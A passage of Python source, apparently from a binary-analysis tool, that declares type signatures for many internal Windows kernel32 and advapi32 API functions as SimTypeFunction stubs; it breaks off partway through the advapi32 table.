"CreateProcessInternalW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"OpenProfileUserMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"GetConsoleHardwareState": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleNlsMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"AddLocalAlternateComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckBadapp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleKeyboardLayoutNameA": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcmpi": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFormatObjectAttributes": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LZCloseFile": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedPipeAttribute": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepMapModuleHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetNamedPipeAttribute": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCreateKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleOS2OemFormat": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"TermsrvAppInstallMode": SimTypeFunction([], SimTypeLong(signed=True)),
"RemoveLocalAlternateComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LZCreateFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsUpdateLocale": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWowBaseHandlers": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetClientTimeZoneInformation": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckRunApp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseThreadInitThunk": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UpdateCalendarDayOfWeek": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleMaximumWindowSize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertNLSDayOfWeekToWin32DayOfWeek": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertCalDateTimeToSystemTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReplaceFile": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleCharType": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleInputWaitHandle": SimTypeFunction([], SimTypeLong(signed=True)),
"RestoreLastError": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CompareCalendarDates": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLocalPrimaryComputerNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UnregisterConsoleIME": SimTypeFunction([], SimTypeLong(signed=True)),
"lstrcat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseInitAppcompatCacheSupport": SimTypeFunction([], SimTypeLong(signed=True)),
"InterlockedPushListSList": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetEnvironmentStringsA": SimTypeFunction([], SimTypeLong(signed=True)),
"CreateSocketHandle": SimTypeFunction([], SimTypeLong(signed=True)),
"RegSetKeySecurity": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetThreadToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryInfoKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNumberOfConsoleFonts": SimTypeFunction([], SimTypeLong(signed=True)),
"GetCalendarSupportedDateRange": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegOpenKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegKrnGetGlobalState": SimTypeFunction([], SimTypeLong(signed=True)),
"WerpNotifyUseStringResource": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleFont": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseGetNamedObjectDirectory": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapMonth": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteTreeW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsValidCalDateTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryValueExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleCursor": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteTreeA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SortGetHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpInitiateRemoteRecovery": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VDMOperationStarted": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"OpenProcessToken": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"VDMConsoleOperation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseVerifyUnicodeString": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegUnLoadKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetProcessUserModeExceptionPolicy": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNextVDMCommand": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadStringBaseW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DuplicateConsoleHandle": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckAppcompatCache": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpStringLookup": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseDumpAppcompatCache": SimTypeFunction([], SimTypeLong(signed=True)),
"CreateProcessInternalA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsEventDataDescCreate": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegRestoreKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsWriteEtwEvent": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegCloseKey": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NotifyMountMgr": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapYear": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DosPathToSessionPathA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepAnsiStringToDynamicUnicodeString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLocalPrimaryComputerNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcpyn": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleLocalEUDC": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"PrivCopyFileExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleCursorMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterConsoleOS2": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleIcon": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleInputExeNameW": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleHardwareState": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleCursorMode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ReadConsoleInputExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WerpNotifyLoadStringResource": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCheckAppcompatCacheEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"PrivMoveFileIdentityW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CmdBatNotification": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFormatTimeOut": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"InvalidateConsoleDIBits": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSaveKeyExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsCalendarLeapDay": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseCleanupAppcompatCacheSupport": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepAllocateActivationContextActivationBlock": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"DelayLoadFailureHook": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WriteConsoleInputVDMA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadKeyW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"lstrcmp": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConsoleMenuControl": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseQueryModuleData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegDeleteKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegLoadMUIStringW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetHandleContext": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IdnToUnicode": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegKrnInitialize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseFlushAppcompatCache": SimTypeFunction([], SimTypeLong(signed=True)),
"GetCalendarWeekNumber": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"NlsUpdateSystemLocale": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetComPlusPackageInstallStatus": SimTypeFunction([], SimTypeLong(signed=True)),
"BaseIsAppcompatInfrastructureDisabled": SimTypeFunction([], SimTypeLong(signed=True)),
"WerpCleanupMessageMapping": SimTypeFunction([], SimTypeLong(signed=True)),
"RegisterWowExec": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepCheckAppCompat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleMenuClose": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDifferenceInDays": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LoadStringBaseExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleInputExeNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsolePalette": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDaysInMonth": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseGenerateAppCompatData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetLastConsoleEventActive": SimTypeFunction([], SimTypeLong(signed=True)),
"GetConsoleInputExeNameW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegGetValueW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetHandleContext": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetConsoleKeyShortcuts": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BaseUpdateAppcompatCache": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepFreeActivationContextActivationBlock": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetBinaryType": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"Basep8BitStringToDynamicUnicodeString": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegQueryInfoKeyA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"BasepFreeAppCompatData": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumKeyExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckElevationEnabled": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDateFormatEx": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegSetValueExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegEnumValueA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetConsoleKeyboardLayoutNameW": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetComPlusPackageInstallStatus": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetVDMCurrentDirectories": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseConsoleHandle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumerateLocalComputerNamesA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"UTUnRegister": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetCalendarDateFormat": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SetProcessUserModeExceptionPolicy": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CheckElevation": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"RegisterWaitForInputIdle": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSystemTimeToCalDateTime": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"IsTimeZoneRedirectionEnabled": SimTypeFunction([], SimTypeLong(signed=True)),
}
missing_declarations["advapi32"] = {
"GetInformationCodeAuthzLevelW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiFreeBuffer": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetNamedSecurityInfoExW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiQuerySingleInstanceMultipleA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertSecurityDescriptorToAccessA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredProfileLoaded": SimTypeFunction([], SimTypeLong(signed=True)),
"WmiExecuteMethodW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ProcessIdleTasksW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Final": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction013": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CredpConvertOneCredentialSize": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EncryptedFileKeyInfo": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfBackupEventLogFileW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"MD4Update": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"CloseCodeAuthzLevel": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"EnumServiceGroupW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"GetSecurityInfoExA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfReportEventA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction027": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaEnumeratePrivilegesOfAccount": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SystemFunction024": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ConvertAccessToSecurityDescriptorW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiDevInstToInstanceNameA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"WmiEnumerateGuids": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"SaferiRegisterExtensionDll": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaCreateSecret": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenEventLogW": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfOpenEventLogA": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaGetUserName": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"A_SHAInit": SimTypeFunction([SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"LsaOpenPolicySce": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
"ElfChangeNotify": SimTypeFunction([SimTypeLong(signed=True), SimTypeLong(signed=True)], SimTypeLong(signed=True)),
